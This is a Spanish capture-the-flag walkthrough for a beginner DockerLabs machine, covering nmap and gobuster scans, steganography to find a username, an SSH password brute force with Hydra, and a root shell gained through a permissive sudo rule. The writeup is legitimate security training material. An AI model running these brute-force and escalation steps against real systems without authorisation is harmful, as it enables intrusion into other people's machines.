BorazuwarahCTF - DockerLabs
| OS | Dificultad | Creator |
|---|---|---|
| Linux | Muy Facil | Borazuwarah |
Escaneo y Reconocimiento de puertos
Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.
nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2
-p-: Escanea todos los puertos (1-65535).--open: Solo muestra los puertos abiertos.-sS: Realiza un escaneo SYN, que es rápido y discreto.-sC: Utiliza los scripts de reconocimiento por defecto de Nmap.-sV: Detecta la versión del servicio en los puertos abiertos.--min-rate=5000: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.-n: No realiza resolución DNS.-Pn: No realiza ping previo para determinar si el host está activo.-vvv: Muestra resultados detallados y en tiempo real.
Vemos que esta abierto el puerto 22 SSH y el puerto 80 HTTP
Enumeración Web
Si accedemos a la pagina web vemos lo siguiente
Usamos Gobuster para hacer un reconocimiento web y ver que directorios podemos encontrar en dicho sitio.
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
gobuster dir- Indica que estás utilizando la herramienta Gobuster para realizar un escaneo de directorios.-u http://172.20.10.5/Especifica la URL objetivo que deseas escanear en busca de directorios.-wEspecifica que diccionario queremos usar-xPara indicar que tipo de extension queremos que nos encuentre
Gobuster no ha encontrado nada
Vamos a descargar la imagen del huevo kinder
Esteganografía
Y vemos este mensaje
Si usamos otra herramienta de esteganografía como exiftool vemos lo siguiente.
Ya tenemos un usuario ahora vamos hacer un ataque con fuerza bruta al SSH.
Ataque de fuerza bruta con Hydra
Como tenemos un possible usuario, vamos hacer un ataque de fuerza bruta con Hydra al protocolo ssh de la siguiente forma:
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2
-l- Para especificar el usaurio-P- Para especificar que diccionario de fuerza bruta usaremosssh://172.17.0.2- Especificamos que queremos atentar contra el protocolo SSH de la IP victima
Como vemos, existe el usuario borazuwarah y la contraseña es 123456.
Intrusión
Ahora accedemos vía SSH
ssh borazuwarah@172.17.0.2
En la maquina no encontramos nada interesante así que vamos a escalar privilegios
Escalada de privilegios
Si hacemos un sudo -l nos aparece lo siguiente
Ejecutamos el siguiente comando sudo -u root /bin/bash
Ya somos ROOT!